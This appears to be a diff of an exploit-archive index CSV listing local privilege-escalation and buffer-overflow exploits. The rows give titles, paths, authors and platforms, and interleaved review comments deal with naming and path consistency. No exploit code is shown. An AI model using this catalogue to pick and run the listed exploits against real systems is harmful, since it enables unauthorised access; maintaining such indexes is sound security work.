16307,platforms/multiple/local/16307.rb,"PeaZIP 2.6.1 - Zip Processing Command Injection (Metasploit)",2010-09-20,Metasploit,multiple,local,0
40435,platforms/lin_x86/local/40435.rb,"Linux Kernel 4.6.3 - 'Netfilter' Privilege Escalation (Metasploit)",2016-09-27,Metasploit,lin_x86,local,0
40435,platforms/lin_x86/local/40435.rb,"Linux Kernel 4.6.3 (x86) - 'Netfilter' Privilege Escalation (Metasploit)",2016-09-27,Metasploit,lin_x86,local,0
16503,platforms/windows/local/16503.rb,"Adobe - Doc.media.newPlayer Use-After-Free (Metasploit) (1)",2010-04-30,Metasploit,windows,local,0
16504,platforms/windows/local/16504.rb,"Adobe - 'util.printf()' Buffer Overflow (Metasploit) (1)",2010-05-03,Metasploit,windows,local,0
16531,platforms/windows/local/16531.rb,"Winamp - Playlist UNC Path Computer Name Overflow (Metasploit)",2010-04-30,Metasploit,windows,local,0
@ -6771,7 +6772,7 @@ id,file,description,date,author,platform,type,port
16688,platforms/windows/local/16688.rb,"Zinf Audio Player 2.2.1 - '.pls' Stack Buffer Overflow (Metasploit)",2010-11-24,Metasploit,windows,local,0
16940,platforms/windows/local/16940.c,".NET Runtime Optimization Service - Privilege Escalation",2011-03-08,XenoMuta,windows,local,0
16942,platforms/windows/local/16942.pl,"Movavi VideoSuite 8.0 MediaPlayer - '.m3u' Buffer Overflow",2011-03-08,KedAns-Dz,windows,local,0
16951,platforms/bsd/local/16951.c,"FreeBSD 6.4 - Netgraph Local Privilege Escalation Exploit",2011-03-10,zx2c4,bsd,local,0
16951,platforms/bsd/local/16951.c,"FreeBSD 6.4 - Netgraph Privilege Escalation",2011-03-10,zx2c4,bsd,local,0
16965,platforms/windows/local/16965.pl,"CoolZip 2.0 - zip Buffer Overflow",2011-03-12,"C4SS!0 G0M3S",windows,local,0
16971,platforms/windows/local/16971.py,"ABBS Audio Media Player - '.m3u' / '.LST' Buffer Overflow",2011-03-14,Rh0,windows,local,0
16976,platforms/windows/local/16976.pl,"ABBS Audio Media Player 3.0 - '.lst' Buffer Overflow (SEH)",2011-03-14,h1ch4m,windows,local,0
@ -6935,13 +6936,13 @@ id,file,description,date,author,platform,type,port
18808,platforms/windows/local/18808.html,"SAMSUNG NET-i Viewer 1.37 - Overwrite (SEH)",2012-05-01,blake,windows,local,0
18823,platforms/windows/local/18823.txt,"Symantec pcAnywhere - Insecure File Permissions Privilege Escalation",2012-05-02,"Edward Torkington",windows,local,0
18826,platforms/windows/local/18826.py,"AnvSoft Any Video Converter 4.3.6 - Stack Overflow",2012-05-03,cikumel,windows,local,0
18861,platforms/windows/local/18861.php,"PHP 5.4.3 (Windows x86 Polish) - Code Execution",2012-05-11,0in,windows,local,0
18861,platforms/win_x86/local/18861.php,"PHP 5.4.3 (Windows x86 Polish) - Code Execution",2012-05-11,0in,win_x86,local,0
18862,platforms/windows/local/18862.php,"Adobe Photoshop CS5.1 - U3D.8BI Collada Asset Elements Stack Overflow",2012-05-11,rgod,windows,local,0
18869,platforms/windows/local/18869.pl,"AnvSoft Any Video Converter 4.3.6 - Unicode Buffer Overflow",2012-05-12,h1ch4m,windows,local,0
18892,platforms/windows/local/18892.txt,"SkinCrafter ActiveX Control 3.0 - Buffer Overflow",2012-05-17,"saurabh sharma",windows,local,0
18905,platforms/windows/local/18905.rb,"Foxit Reader 3.0 - Open Execute Action Stack Based Buffer Overflow (Metasploit)",2012-05-21,Metasploit,windows,local,0
18914,platforms/windows/local/18914.py,"Novell Client 4.91 SP4 - Privilege Escalation",2012-05-22,sickness,windows,local,0
18917,platforms/linux/local/18917.txt,"Apache (Mod_Auth_OpenID) - Session Stealing",2012-05-24,"Peter Ellehauge",linux,local,0
18917,platforms/linux/local/18917.txt,"Apache Mod_Auth_OpenID - Session Stealing",2012-05-24,"Peter Ellehauge",linux,local,0
18923,platforms/windows/local/18923.rb,"OpenOffice - OLE Importer DocumentSummaryInformation Stream Handling Overflow (Metasploit)",2012-05-25,Metasploit,windows,local,0
18981,platforms/windows/local/18981.txt,"Sysax 5.60 - Create SSL Certificate Buffer Overflow",2012-06-04,"Craig Freyman",windows,local,0
18947,platforms/windows/local/18947.rb,"ispVM System - '.XCF' File Handling Overflow (Metasploit)",2012-05-29,Metasploit,windows,local,0
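Review bot: row 18917 is renamed to "Apache Mod_Auth_OpenID" with capitals, but the Apache module rows renamed in this same commit use the module's lowercase name (mod_php, mod_perl, mod_include, mod_proxy); use "mod_auth_openid" for consistency. Also, a session-stealing issue in an authentication module is filed under type local here; confirm that local is right rather than the remote or webapps section.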
@ -7689,7 +7690,7 @@ id,file,description,date,author,platform,type,port
22246,platforms/hp-ux/local/22246.c,"HP-UX 10.x - stmkfont Alternate Typeface Library Buffer Overflow (1)",2003-02-12,"Last Stage of Delirium",hp-ux,local,0
22247,platforms/hp-ux/local/22247.sh,"HP-UX 10.x - stmkfont Alternate Typeface Library Buffer Overflow (2)",2003-02-20,watercloud,hp-ux,local,0
22248,platforms/hp-ux/local/22248.sh,"HP-UX 10.x - rs.F3000 Unspecified Unauthorized Access",2003-02-12,"Last Stage of Delirium",hp-ux,local,0
22265,platforms/linux/local/22265.pl,"cPanel 5.0 - Openwebmail Privilege Escalation",2003-02-19,deadbeat,linux,local,0
22265,platforms/linux/local/22265.pl,"cPanel 5.0 - 'Openwebmail' Privilege Escalation",2003-02-19,deadbeat,linux,local,0
22272,platforms/multiple/local/22272.pl,"Perl2Exe 1.0 9/5.0 2/6.0 - Code Obfuscation",2002-02-22,"Simon Cozens",multiple,local,0
22332,platforms/unix/local/22332.c,"BSD lpr 2000.05.07/0.48/0.72 / lpr-ppd 0.72 - Local Buffer Overflow (2)",1998-04-22,CMN,unix,local,0
22331,platforms/unix/local/22331.c,"BSD lpr 2000.05.07/0.48/0.72 / lpr-ppd 0.72 - Local Buffer Overflow (1)",1998-04-22,"Niall Smart",unix,local,0
@ -7839,11 +7840,11 @@ id,file,description,date,author,platform,type,port
23364,platforms/linux/local/23364.sh,"WMAPM 3.1 - Privilege Escalation",2003-11-08,"Knud Erik Hojgaard",linux,local,0
23414,platforms/linux/local/23414.txt,"FVWM 2.4/2.5 - fvwm-menu-Directory Command Execution",2003-12-05,auto22238,linux,local,0
23479,platforms/linux/local/23479.sh,"GNU Indent 2.2.9 - Local Heap Overflow",2003-12-26,"Pooh Hacking Squadron",linux,local,0
23481,platforms/linux/local/23481.c,"Apache 2.0.4x (mod_php) - File Descriptor Leakage (1)",2003-12-26,"Steve Grubb",linux,local,0
23482,platforms/linux/local/23482.c,"Apache 2.0.4x (mod_php) - File Descriptor Leakage (2)",2003-12-26,"frauk\x41ser",linux,local,0
23481,platforms/linux/local/23481.c,"Apache 2.0.4x mod_php - File Descriptor Leakage (1)",2003-12-26,"Steve Grubb",linux,local,0
23482,platforms/linux/local/23482.c,"Apache 2.0.4x mod_php - File Descriptor Leakage (2)",2003-12-26,"frauk\x41ser",linux,local,0
23510,platforms/linux/local/23510.c,"XSOK 1.0 2 - LANG Environment Variable Local Buffer Overrun",2003-12-30,N2n-Hacker,linux,local,0
23511,platforms/windows/local/23511.txt,"Surfnet 1.31 - Unauthorized Account Depositing",2004-01-02,Rift_XT,windows,local,0
23581,platforms/linux/local/23581.pl,"Apache 2.0.4x (mod_perl) - File Descriptor Leakage (3)",2004-01-21,"Steve Grubb",linux,local,0
23581,platforms/linux/local/23581.pl,"Apache 2.0.4x mod_perl - File Descriptor Leakage (3)",2004-01-21,"Steve Grubb",linux,local,0
23609,platforms/unix/local/23609.sh,"IBM Informix Dynamic Server 9.40/Informix Extended Parallel Server 8.40 - Multiple Vulnerabilities (1)",2003-08-08,pask,unix,local,0
23610,platforms/unix/local/23610.c,"IBM Informix Dynamic Server 9.40/Informix Extended Parallel Server 8.40 - Multiple Vulnerabilities (2)",2003-08-08,pask,unix,local,0
23611,platforms/multiple/local/23611.pl,"OracleAS TopLink Mapping Workbench - Weak Encryption Algorithm",2004-01-28,"Pete Finnigan",multiple,local,0
@ -7880,7 +7881,7 @@ id,file,description,date,author,platform,type,port
24064,platforms/unix/local/24064.pl,"Veritas NetBackup 3.5/4.5/5.0 - Multiple Unspecified Local Memory Corruption Vulnerabilities (3)",2004-04-25,"Secure Network Operations",unix,local,0
24113,platforms/bsd/local/24113.c,"NetBSD/FreeBSD Port Systrace 1.x - Exit Routine Access Validation Privilege Escalation",2004-05-11,"Stefan Esser",bsd,local,0
24123,platforms/linux/local/24123.sh,"WGet 1.x - Insecure File Creation Race Condition",2004-05-17,"Hugo Vazquez",linux,local,0
24141,platforms/linux/local/24141.txt,"cPanel 5-9 - Privilege Escalation",2004-05-24,"Rob Brown",linux,local,0
24141,platforms/linux/local/24141.txt,"cPanel 5 < 9 - Privilege Escalation",2004-05-24,"Rob Brown",linux,local,0
24171,platforms/windows/local/24171.c,"SmartStuff FoolProof Security Program 3.9.x - Administrative Password Recovery",2004-06-05,"Cyrillium Security",windows,local,0
24173,platforms/php/local/24173.txt,"PHP 4.3.x - Microsoft Windows Shell Escape functions Command Execution",2004-06-07,"Daniel Fabian",php,local,0
24182,platforms/linux/local/24182.c,"CVS 1.11.x - Multiple Vulnerabilities",2004-06-09,"Gyan Chawdhary",linux,local,0
@ -7909,7 +7910,7 @@ id,file,description,date,author,platform,type,port
24609,platforms/osx/local/24609.txt,"MacOSXLabs RsyncX 2.1 - Insecure Temporary File Creation",2004-09-17,"Matt Johnston",osx,local,0
24678,platforms/windows/local/24678.txt,"IBM DB2 - Universal Database Information Disclosure",2004-09-01,"Chris Anley",windows,local,0
24682,platforms/windows/local/24682.c,"Microsoft Windows XP - Weak Default Configuration",2004-10-13,americanidiot,windows,local,0
24694,platforms/linux/local/24694.c,"Apache 1.3.x (mod_include) - Local Buffer Overflow",2004-10-18,xCrZx,linux,local,0
24694,platforms/linux/local/24694.c,"Apache 1.3.x mod_include - Local Buffer Overflow",2004-10-18,xCrZx,linux,local,0
24746,platforms/lin_x86-64/local/24746.c,"Linux Kernel 3.7.10 (Ubuntu 12.10 x64) - 'sock_diag_handlers' Privilege Escalation (2)",2013-03-13,"Kacper Szczesniak",lin_x86-64,local,0
24749,platforms/linux/local/24749.sh,"Cscope 13.0/15.x - Insecure Temporary File Creation Vulnerabilities (1)",2004-11-17,Gangstuck,linux,local,0
24750,platforms/linux/local/24750.c,"Cscope 13.0/15.x - Insecure Temporary File Creation Vulnerabilities (2)",2004-11-17,Gangstuck,linux,local,0
@ -7927,7 +7928,7 @@ id,file,description,date,author,platform,type,port
24923,platforms/multiple/local/24923.txt,"Google AD Sync Tool - Exposure of Sensitive Information",2013-04-08,"Sense of Security",multiple,local,0
24929,platforms/linux/local/24929.rb,"HP System Management Homepage - Privilege Escalation (Metasploit)",2013-04-08,Metasploit,linux,local,0
24933,platforms/linux/local/24933.txt,"PonyOS 0.4.99-mlp - Multiple Vulnerabilities",2013-04-08,"John Cartwright",linux,local,0
25039,platforms/aix/local/25039.txt,"IBM AIX 5.x - Diag Privilege Escalation Vulnerabilities",2004-12-20,cees-bart,aix,local,0
25039,platforms/aix/local/25039.txt,"IBM AIX 5.x - 'Diag' Privilege Escalation",2004-12-20,cees-bart,aix,local,0
25040,platforms/php/local/25040.php,"PHP 4.x/5.0 Shared Memory Module - Offset Memory Corruption",2004-12-20,"Stefano Di Paola",php,local,0
25055,platforms/osx/local/25055.c,"Darwin Kernel 7.1 - Mach File Parsing Local Integer Overflow",2005-01-19,nemo@felinemenace.org,osx,local,0
25080,platforms/linux/local/25080.txt,"Newsgrab 0.5.0pre4 - Multiple Local And Remote Vulnerabilities",2005-02-02,"Niels Heinen",linux,local,0
@ -8069,7 +8070,7 @@ id,file,description,date,author,platform,type,port
28955,platforms/windows/local/28955.py,"Internet Haut Debit Mobile PCW_MATMARV1.0.0B03 - Buffer Overflow (SEH)",2013-10-14,metacom,windows,local,0
28969,platforms/windows/local/28969.py,"Beetel Connection Manager PCW_BTLINDV1.0.0B04 - Buffer Overflow (SEH)",2013-10-15,metacom,windows,local,0
28984,platforms/hp-ux/local/28984.pl,"HP Tru64 4.0/5.1 - POSIX Threads Library Privilege Escalation",2006-11-13,"Adriel T. Desautels",hp-ux,local,0
40768,platforms/linux/local/40768.sh,"Nginx (Debian-Based + Gentoo) - 'logrotate' Local Privilege Escalation",2016-11-16,"Dawid Golunski",linux,local,0
40768,platforms/linux/local/40768.sh,"Nginx (Debian-Based Distros + Gentoo) - 'logrotate' Privilege Escalation",2016-11-16,"Dawid Golunski",linux,local,0
29069,platforms/windows/local/29069.c,"Computer Associates Personal Firewall 9.0 - HIPS Driver 'kmxfw.sys' Privilege Escalation",2006-11-16,"Ruben Santamarta",windows,local,0
29070,platforms/windows/local/29070.c,"Computer Associates Personal Firewall 9.0 - HIPS Driver 'kmxstart.sys' Privilege Escalation",2006-11-16,"Ruben Santamarta",windows,local,0
29102,platforms/openbsd/local/29102.c,"OpenBSD 3.9/4.0 - ld.so Local Environment Variable Clearing",2006-11-20,"Mark Dowd",openbsd,local,0
@ -8542,7 +8543,7 @@ id,file,description,date,author,platform,type,port
39214,platforms/linux/local/39214.c,"Linux Kernel 3.3.5 - '/drivers/media/media-device.c' Local Information Disclosure",2014-05-28,"Salva Peiro",linux,local,0
39217,platforms/linux/local/39217.c,"Amanda 3.3.1 - Privilege Escalation",2016-01-11,"Hacker Fantastic",linux,local,0
39230,platforms/linux/local/39230.c,"Linux Kernel 4.3.3 - 'overlayfs' Privilege Escalation (2)",2016-01-12,halfdog,linux,local,0
39244,platforms/linux/local/39244.txt,"Amanda 3.3.1 - amstar Command Injection Privilege Escalation",2016-01-15,"Hacker Fantastic",linux,local,0
39244,platforms/linux/local/39244.txt,"Amanda 3.3.1 - 'amstar' Command Injection Privilege Escalation",2016-01-15,"Hacker Fantastic",linux,local,0
39260,platforms/windows/local/39260.txt,"WEG SuperDrive G2 12.0.0 - Insecure File Permissions",2016-01-18,LiquidWorm,windows,local,0
39277,platforms/linux/local/39277.c,"Linux Kernel 4.4.1 - REFCOUNT Overflow/Use-After-Free in Keyrings Privilege Escalation (1)",2016-01-19,"Perception Point Team",linux,local,0
40003,platforms/linux/local/40003.c,"Linux Kernel 4.4.1 - REFCOUNT Overflow/Use-After-Free in Keyrings Privilege Escalation (2)",2016-01-19,"Federico Bento",linux,local,0
@ -8555,22 +8556,22 @@ id,file,description,date,author,platform,type,port
40774,platforms/linux/local/40774.sh,"Nagios 4.2.2 - Privilege Escalation",2016-11-18,"Vincent Malguy",linux,local,0
39340,platforms/android/local/39340.cpp,"Google Android - 'sensord' Privilege Escalation",2016-01-27,s0m3b0dy,android,local,0
39417,platforms/windows/local/39417.py,"FTPShell Client 5.24 - (Create NewFolder) Local Buffer Overflow",2016-02-04,"Arash Khazaei",windows,local,0
39432,platforms/windows/local/39432.c,"Microsoft Windows 7 SP1 (x86) - 'WebDAV' Privilege Escalation (MS16-016) (1)",2016-02-10,koczkatamas,windows,local,0
39433,platforms/linux/local/39433.py,"Deepin Linux 15 - lastore-daemon Privilege Escalation",2016-02-10,"King's Way",linux,local,0
39432,platforms/win_x86/local/39432.c,"Microsoft Windows 7 SP1 (x86) - 'WebDAV' Privilege Escalation (MS16-016) (1)",2016-02-10,koczkatamas,win_x86,local,0
39433,platforms/linux/local/39433.py,"Deepin Linux 15 - 'lastore-daemon' Privilege Escalation",2016-02-10,"King's Way",linux,local,0
39438,platforms/xml/local/39438.txt,"Wieland wieplan 4.1 - Document Parsing Java Code Execution Using XMLDecoder",2016-02-10,LiquidWorm,xml,local,0
39442,platforms/windows/local/39442.txt,"Microsoft Windows - Kerberos Security Feature Bypass (MS16-014)",2016-02-15,"Nabeel Ahmed",windows,local,0
39443,platforms/windows/local/39443.py,"Delta Industrial Automation DCISoft 1.12.09 - Stack Buffer Overflow",2016-02-15,LiquidWorm,windows,local,0
39446,platforms/win_x86/local/39446.py,"Microsoft Windows - 'afd.sys' Dangling Pointer Privilege Escalation (MS14-040)",2016-02-15,"Rick Larabee",win_x86,local,0
39446,platforms/win_x86/local/39446.py,"Microsoft Windows 7 (x86) - 'afd.sys' Dangling Pointer Privilege Escalation (MS14-040)",2016-02-15,"Rick Larabee",win_x86,local,0
39480,platforms/windows/local/39480.py,"Core FTP Server 1.2 - Buffer Overflow (PoC)",2016-02-22,INSECT.B,windows,local,0
39508,platforms/windows/local/39508.ps1,"Comodo Anti-Virus - 'SHFolder.dll' Local Privilege Elevation Exploit",2016-02-29,Laughing_Mantis,windows,local,0
39510,platforms/windows/local/39510.txt,"Crouzet em4 soft 1.1.04 and M3 soft 3.1.2.0 - Insecure File Permissions",2016-03-01,LiquidWorm,windows,local,0
39520,platforms/win_x86-64/local/39520.txt,"Secret Net 7 and Secret Net Studio 8 - Privilege Escalation",2016-03-02,Cr4sh,win_x86-64,local,0
39523,platforms/windows/local/39523.rb,"AppLocker - Execution Prevention Bypass (Metasploit)",2016-03-03,Metasploit,windows,local,0
39525,platforms/win_x86-64/local/39525.py,"Microsoft Windows 7 (x64) - 'afd.sys' Privilege Escalation (MS14-040)",2016-03-07,"Rick Larabee",win_x86-64,local,0
39525,platforms/win_x86-64/local/39525.py,"Microsoft Windows 7 (x64) - 'afd.sys' Dangling Pointer Privilege Escalation (MS14-040)",2016-03-07,"Rick Larabee",win_x86-64,local,0
39531,platforms/windows/local/39531.c,"McAfee VirusScan Enterprise 8.8 - Security Restrictions Bypass",2016-03-07,"Maurizio Agazzini",windows,local,0
39535,platforms/linux/local/39535.sh,"Exim 4.84-3 - Privilege Escalation",2016-03-09,"Hacker Fantastic",linux,local,0
39549,platforms/linux/local/39549.txt,"Exim < 4.86.2 - Privilege Escalation",2016-03-10,"Dawid Golunski",linux,local,0
39574,platforms/windows/local/39574.cs,"Microsoft Windows 8.1/10 (x86) - Secondary Logon Standard Handles Missing Sanitization Privilege Escalation (MS16-032)",2016-03-21,"Google Security Research",windows,local,0
39574,platforms/win_x86/local/39574.cs,"Microsoft Windows 8.1/10 (x86) - Secondary Logon Standard Handles Missing Sanitization Privilege Escalation (MS16-032)",2016-03-21,"Google Security Research",win_x86,local,0
39579,platforms/windows/local/39579.py,"Internet Download Manager 6.25 Build 14 - 'Find file' Unicode SEH Exploit",2016-03-21,"Rakan Alotaibi",windows,local,0
39594,platforms/windows/local/39594.pl,"CoolPlayer (Standalone) build 2.19 - '.m3u' Stack Overflow",2016-03-22,"Charley Celice",windows,local,0
39595,platforms/multiple/local/39595.txt,"Apple Mac OSX / iOS - SUID Binary Logic Error Kernel Code Execution",2016-03-23,"Google Security Research",multiple,local,0
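Review bot: the 39432 and 39574 rows change the file path from `platforms/windows/local/` to `platforms/win_x86/local/` together with the platform column, so the same commit must also move `39432.c` and `39574.cs` into the new directory (a `git mv`); otherwise the CSV references paths that do not exist in the tree. The same path-and-platform pairing needs checking on every other `windows` to `win_x86` row in this change.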
@ -8672,13 +8673,13 @@ id,file,description,date,author,platform,type,port
40484,platforms/windows/local/40484.txt,"Wacom Consumer Service - Unquoted Service Path Privilege Escalation",2016-10-09,"Ross Marks",windows,local,0
40485,platforms/windows/local/40485.txt,"Foxit Cloud Update Service - Unquoted Service Path Privilege Escalation",2016-10-09,"Ross Marks",windows,local,0
40488,platforms/linux/local/40488.txt,"Apache Tomcat 8/7/6 (RedHat-Based Distros) - Privilege Escalation",2016-10-10,"Dawid Golunski",linux,local,0
40489,platforms/lin_x86-64/local/40489.txt,"Linux Kernel 4.6.2 (Ubuntu 16.04.1) - 'IP6T_SO_SET_REPLACE' Privilege Escalation",2016-10-10,"Qian Zhang",lin_x86-64,local,0
40489,platforms/linux/local/40489.txt,"Linux Kernel 4.6.2 (Ubuntu 16.04.1) - 'IP6T_SO_SET_REPLACE' Privilege Escalation",2016-10-10,"Qian Zhang",linux,local,0
40490,platforms/windows/local/40490.txt,"Zend Studio IDE 13.5.1 - Insecure File Permissions Privilege Escalation",2016-10-10,hyp3rlinx,windows,local,0
40494,platforms/windows/local/40494.txt,"Minecraft Launcher 1.6.61 - Insecure File Permissions Privilege Escalation",2016-10-11,"Ross Marks",windows,local,0
40497,platforms/windows/local/40497.txt,"sheed AntiVirus 2.3 - Unquoted Service Path Privilege Escalation",2016-10-11,Amir.ght,windows,local,0
40564,platforms/windows/local/40564.c,"Microsoft Windows (x86) - 'afd.sys' Privilege Escalation (MS11-046)",2016-10-18,"Tomislav Paskalev",windows,local,0
40564,platforms/win_x86/local/40564.c,"Microsoft Windows (x86) - 'afd.sys' Privilege Escalation (MS11-046)",2016-10-18,"Tomislav Paskalev",win_x86,local,0
40503,platforms/linux/local/40503.rb,"Linux Kernel 3.13.1 - 'Recvmmsg' Privilege Escalation (Metasploit)",2016-10-11,Metasploit,linux,local,0
40504,platforms/android/local/40504.rb,"Allwinner 3.4 Legacy Kernel - Local Privilege Escalation (Metasploit)",2016-10-11,Metasploit,android,local,0
40504,platforms/android/local/40504.rb,"Allwinner 3.4 Legacy Kernel - Privilege Escalation (Metasploit)",2016-10-11,Metasploit,android,local,0
40523,platforms/windows/local/40523.txt,"ATKGFNEXSrv ATKGFNEX 1.0.11.1 - Unquoted Service Path Privilege Escalation",2016-10-13,"Cyril Vallicari",windows,local,0
40525,platforms/windows/local/40525.txt,"IObit Malware Fighter 4.3.1 - Unquoted Service Path Privilege Escalation",2016-10-13,Amir.ght,windows,local,0
40528,platforms/windows/local/40528.txt,"Hotspot Shield 6.0.3 - Unquoted Service Path Privilege Escalation",2016-10-13,Amir.ght,windows,local,0
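Review bot: the 40489 row moves in the opposite direction from the rest of this change, from `lin_x86-64` back to the generic `linux` platform, while 40564 in the same hunk moves from `windows` to the arch-specific `win_x86`. If the Ubuntu 16.04.1 exploit is genuinely not arch-specific that is fine, but it deserves a one-line justification in the commit message, and as with the other moves `40489.txt` must be relocated from `platforms/lin_x86-64/local/` to `platforms/linux/local/`.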
@ -8709,7 +8710,7 @@ id,file,description,date,author,platform,type,port
40608,platforms/windows/local/40608.cs,"Microsoft Windows - NtLoadKeyEx Read Only Hive Arbitrary File Write Privilege Escalation (MS16-124)",2016-10-20,"Google Security Research",windows,local,0
40611,platforms/linux/local/40611.c,"Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' /proc/self/mem Race Condition PoC (Write Access)",2016-10-19,"Phil Oester",linux,local,0
40616,platforms/linux/local/40616.c,"Linux Kernel 2.6.22 < 3.9 (x86/x64) - 'Dirty COW' /proc/self/mem Race Condition Privilege Escalation (SUID)",2016-10-21,"Robin Verton",linux,local,0
40627,platforms/windows/local/40627.c,"Microsoft Windows (x86) - 'NDISTAPI' Privilege Escalation (MS11-062)",2016-10-24,"Tomislav Paskalev",windows,local,0
40627,platforms/win_x86/local/40627.c,"Microsoft Windows (x86) - 'NDISTAPI' Privilege Escalation (MS11-062)",2016-10-24,"Tomislav Paskalev",win_x86,local,0
40630,platforms/windows/local/40630.py,"Network Scanner 4.0.0 - SEH Local Buffer Overflow",2016-10-25,n30m1nd,windows,local,0
40634,platforms/linux/local/40634.py,"GNU GTypist 2.9.5-2 - Local Buffer Overflow",2016-10-27,"Juan Sacco",linux,local,0
40636,platforms/windows/local/40636.txt,"HP TouchSmart Calendar 4.1.4245 - Insecure File Permissions Privilege Escalation",2016-10-27,hyp3rlinx,windows,local,0
@ -8717,13 +8718,13 @@ id,file,description,date,author,platform,type,port
40655,platforms/windows/local/40655.txt,"NVIDIA Driver - UVMLiteController ioctl Handling Unchecked Input/Output Lengths Privilege Escalation",2016-10-31,"Google Security Research",windows,local,0
40660,platforms/windows/local/40660.txt,"NVIDIA Driver - NvStreamKms Stack Buffer Overflow in PsSetCreateProcessNotifyRoutineEx Callback Privilege Escalation",2016-10-31,"Google Security Research",windows,local,0
40669,platforms/macos/local/40669.txt,"Apple macOS 10.12 - 'task_t' Privilege Escalation",2016-10-31,"Google Security Research",macos,local,0
40678,platforms/linux/local/40678.c,"MySQL / MariaDB / PerconaDB 5.5.x/5.6.x/5.7.x - 'mysql' System User Privilege Escalation / Race Condition",2016-11-01,"Dawid Golunski",linux,local,0
40678,platforms/linux/local/40678.c,"MySQL / MariaDB / PerconaDB 5.5.x/5.6.x/5.7.x - ('mysql' System User) Privilege Escalation / Race Condition",2016-11-01,"Dawid Golunski",linux,local,0
40686,platforms/multiple/local/40686.txt,"Citrix Receiver/Receiver Desktop Lock 4.5 - Authentication Bypass",2016-11-02,"Rithwik Jayasimha",multiple,local,0
40688,platforms/linux/local/40688.rb,"Linux Kernel (Ubuntu / Fedora / RedHat) - 'Overlayfs' Privilege Escalation (Metasploit)",2016-11-02,Metasploit,linux,local,0
40679,platforms/linux/local/40679.sh,"MySQL / MariaDB / PerconaDB 5.5.x/5.6.x/5.7.x - 'root' Privilege Escalation",2016-11-01,"Dawid Golunski",linux,local,0
40679,platforms/linux/local/40679.sh,"MySQL / MariaDB / PerconaDB 5.5.x/5.6.x/5.7.x - ('root' System User) Privilege Escalation",2016-11-01,"Dawid Golunski",linux,local,0
40710,platforms/aix/local/40710.sh,"IBM AIX 5.3/6.1/7.1/7.2 - 'lquerylv' Privilege Escalation",2016-11-04,"Hector X. Monsegur",aix,local,0
40838,platforms/linux/local/40838.c,"Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' PTRACE_POKEDATA Race Condition PoC (Write Access)",2016-10-26,"Phil Oester",linux,local,0
40759,platforms/linux/local/40759.rb,"Linux Kernel 4.4 (Ubuntu 16.04) - BPF Local Privilege Escalation (Metasploit)",2016-11-14,Metasploit,linux,local,0
40759,platforms/linux/local/40759.rb,"Linux Kernel 4.4 (Ubuntu 16.04) - 'BPF' Privilege Escalation (Metasploit)",2016-11-14,Metasploit,linux,local,0
40741,platforms/windows/local/40741.py,"Avira Antivirus 15.0.21.86 - '.zip' Directory Traversal / Command Execution",2016-11-08,R-73eN,windows,local,0
40765,platforms/windows/local/40765.cs,"Microsoft Windows - VHDMP Arbitrary Physical Disk Cloning Privilege Escalation (MS16-138)",2016-11-15,"Google Security Research",windows,local,0
40788,platforms/linux/local/40788.txt,"Palo Alto Networks PanOS root_trace - Privilege Escalation",2016-11-18,"Google Security Research",linux,local,0
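Review bot: the 40678 and 40679 descriptions introduce a `('mysql' System User)` / `('root' System User)` parenthetical with quotes nested inside parentheses, while elsewhere this change strips parentheses around component names (`mod_php`, `mod_include`) in favour of bare quoted names such as `'amstar'` and `'BPF'`. Consider keeping the previous `'mysql' System User Privilege Escalation` form without the parentheses so the two styles do not coexist in the file.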
@ -8740,7 +8741,7 @@ id,file,description,date,author,platform,type,port
40861,platforms/windows/local/40861.txt,"Microsoft Windows Media Center 6.1.7600 - 'ehshell.exe' XML External Entity Injection",2016-12-04,hyp3rlinx,windows,local,0
40863,platforms/windows/local/40863.txt,"Microsoft Event Viewer 1.0 - XML External Entity Injection",2016-12-05,hyp3rlinx,windows,local,0
40864,platforms/windows/local/40864.txt,"Microsoft MSINFO32.EXE 6.1.7601 - '.NFO' XML External Entity Injection",2016-12-05,hyp3rlinx,windows,local,0
40865,platforms/windows/local/40865.txt,"Apache CouchDB 2.0.0 - Local Privilege Escalation",2016-12-05,hyp3rlinx,windows,local,0
40865,platforms/windows/local/40865.txt,"Apache CouchDB 2.0.0 - Privilege Escalation",2016-12-05,hyp3rlinx,windows,local,0
40871,platforms/linux/local/40871.c,"Linux Kernel 4.4.0 (Ubuntu 14.04/16.04 x86-64) - 'AF_PACKET' Race Condition Privilege Escalation",2016-12-06,rebel,linux,local,0
40873,platforms/windows/local/40873.txt,"Microsoft PowerShell - XML External Entity Injection",2016-12-06,hyp3rlinx,windows,local,0
40902,platforms/windows/local/40902.txt,"EasyPHP Devserver 16.1.1 - Insecure File Permissions Privilege Escalation",2016-12-11,"Ashiyane Digital Security Team",windows,local,0
@ -8751,7 +8752,7 @@ id,file,description,date,author,platform,type,port
40938,platforms/linux/local/40938.py,"RedStar 3.0 Server - 'BEAM & RSSMON' Command Execution (Shellshock)",2016-12-18,"Hacker Fantastic",linux,local,0
40943,platforms/linux/local/40943.txt,"Google Chrome + Fedora 25 / Ubuntu 16.04 - 'tracker-extract' / 'gnome-video-thumbnailer' + 'totem' Drive-By Download",2016-12-13,"Chris Evans",linux,local,0
40950,platforms/aix/local/40950.sh,"IBM AIX 6.1/7.1/7.2 - 'Bellmail' Privilege Escalation",2016-12-22,"Hector X. Monsegur",aix,local,0
40953,platforms/linux/local/40953.sh,"Vesta Control Panel 0.9.8-16 - Local Privilege Escalation",2016-12-22,"Luka Pusic",linux,local,0
40953,platforms/linux/local/40953.sh,"Vesta Control Panel 0.9.8-16 - Privilege Escalation",2016-12-22,"Luka Pusic",linux,local,0
40956,platforms/macos/local/40956.c,"macOS < 10.12.2 / iOS < 10.2 Kernel - _kernelrpc_mach_port_insert_right_trap Reference Count Leak / Use-After-Free",2016-12-22,"Google Security Research",macos,local,0
40957,platforms/macos/local/40957.c,"macOS < 10.12.2 / iOS < 10.2 - Broken Kernel Mach Port Name uref Handling Privileged Port Name Replacement Privilege Escalation",2016-12-22,"Google Security Research",macos,local,0
40962,platforms/linux/local/40962.txt,"OpenSSH < 7.4 - 'UsePrivilegeSeparation Disabled' Forwarded Unix Domain Sockets Privilege Escalation",2016-12-23,"Google Security Research",linux,local,0
@ -8769,9 +8770,10 @@ id,file,description,date,author,platform,type,port
41152,platforms/linux/local/41152.txt,"GNU Screen 4.5.0 - Privilege Escalation (PoC)",2017-01-24,"Donald Buczek",linux,local,0
41154,platforms/linux/local/41154.sh,"GNU Screen 4.5.0 - Privilege Escalation",2017-01-25,"Xiphos Research Ltd",linux,local,0
41158,platforms/linux/local/41158.txt,"Man-db 2.6.7.1 - Privilege Escalation (PoC)",2015-12-02,halfdog,linux,local,0
